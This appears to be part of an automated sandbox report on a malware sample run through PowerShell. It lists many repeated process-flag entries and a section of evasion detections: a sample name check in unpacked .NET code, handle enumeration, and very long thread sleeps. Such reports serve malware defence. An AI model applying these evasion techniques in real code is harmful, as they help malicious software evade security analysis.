                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (42 identical entries)

                Malware Analysis System Evasion

                Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.cs | .Net Code: Main contains sample name check
                Source: 10.2.powershell.exe.89f0000.3.raw.unpack, ymdoz.cs | .Net Code: Main contains sample name check
                Source: 10.2.powershell.exe.5cdeb28.1.raw.unpack, ymdoz.cs | .Net Code: Main contains sample name check
                Source: 10.2.powershell.exe.5edd388.2.raw.unpack, ymdoz.cs | .Net Code: Main contains sample name check
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle | 13_2_0040DD85
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (48 identical entries)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5853
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3848
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: foregroundWindowGot 1746
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5159
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3865
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5226
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2800
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3485
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4541
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4168
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2522
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5373
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1587
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5721
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3992
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4270
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3587
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2649
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3486
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3318
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2279
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3429
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | API coverage: 8.4 %
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4572 | Thread sleep count: 5853 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3748 | Thread sleep count: 3848 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196 | Thread sleep time: -14757395258967632s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6104 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6104 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2572 | Thread sleep count: 5159 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4380 | Thread sleep count: 3865 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5396 | Thread sleep time: -12912720851596678s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5812 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4180 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5944 | Thread sleep count: 5226 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6928 | Thread sleep count: 2800 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492 | Thread sleep time: -12912720851596678s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4700 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5944 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388 | Thread sleep count: 3485 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388 | Thread sleep count: 4541 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492 | Thread sleep time: -11068046444225724s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6172 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2368 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5484 | Thread sleep count: 4168 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5368 | Thread sleep time: -10145709240540247s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4700 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5484 | Thread sleep count: 2522 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5704 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736 | Thread sleep count: 5373 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4936 | Thread sleep time: -9223372036854770s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5320 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684 | Thread sleep count: 1587 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6752 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136 | Thread sleep count: 5721 > 30
